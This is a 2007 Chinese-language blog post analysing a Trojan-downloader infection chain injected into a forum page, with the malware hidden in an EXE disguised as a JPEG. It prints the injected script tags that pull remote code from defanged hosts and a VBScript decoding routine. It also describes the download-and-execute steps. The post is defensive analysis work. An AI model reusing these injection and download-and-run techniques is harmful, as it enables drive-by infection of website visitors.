endurer 原创
2007-05-17 第1版
前几天,打开某论坛时,Kaspersky报告:已检测 木马程序 Trojan-Downloader.HTML.Agent.df
检查网页发现首部被植入代码:
/---
<script language="javascript" src="hxxp://61.146.118.1*1/news***/include/md5.asp?ad=1"></script>
---/
hxxp://61.146.118.1*1/news***/include/md5.asp?ad=1 的内容为:
/---
document.write("<script language=/"javascript/" src=/"");
document.write("hxxp://www.ha**v**eip.com/d**a.asp/">");
document.write("</script>");
---/
hxxp://www.ha**v**eip.com/d**a.asp 包含代码:
/---
var ad_str="<script language=/"javascript/" src=/"hxxp://www.blogchina.com/resource/upload***/pic***/2006/05/05/wpt**8.js/"><//script>"
SetCookie("my_ad","yes",3600,"/");document.write(ad_str);}
//-->
hxxp://www.blogchina.com/resource/upload***/pic***/2006/05/05/wpt**8.js 包含JavaScript脚本代码,功能是输出VBScript脚本代码。
输出的VBScript脚本代码的功能是使用自定义解密函数
/---
function r(k)
s=Split(k,"@")
t=""
For i_ = 0 To UBound(s)
t=t+Chr(eval(s(i_)))
Next
r=t
End Function
---/
解密并输出变量t的值。
解密后的变量t的值为 VBScript脚本,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件wpt8.vbe,保存为 IE临时文件夹下的webpnt.vbe,然后通过 Shell.Application 对象 Q 的 ShellExecute 方法 来运行。
wpt8.vbe 的内容为VBScript脚本,功能是是使用自定义解密函数
/---
function r(k)
s=Split(k,"@")
t=""
For i_ = 0 To UBound(s)
t=t+Chr(eval(s(i_)))
Next
r=t
End Function
---/
解密并执行变量t的值。
解密后的变量t的值为VBScript脚本,功能是利用 Microsoft.XMLHTTP、ADODB.Stream 和 scrīpting.FileSystemObject 下载文件hxxp://11***8.img**.pp**.sohu.com/images/2007/5/11/1***0/24/11***31**1048215.jpg,保存为 IE临时文件夹下的 webpnt.exe,然后通过 Shell.Run 来运行。
文件说明符 : D:/test/11311048215.jpg
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-13 23:30:51
修改时间 : 2007-5-13 23:29:18
访问时间 : 2007-5-13 23:32:51
大小 : 20011 字节 19.555 KB
MD5 : 4ec141d8dc997f5592821a415fc4850f
这个文件开头有JPEG文件信息,但后面内容是PE格式的EXE文件内容。
Kaspersky的病毒分析师的回复:
Hello.
This file is not malicious itself and it wouldn't be detected, but it contains new malware that we detected as Trojan.Win32.VB.azc.
-----------------
Regards, Alexander Romanenko
Virus Analyst, Kaspersky Lab.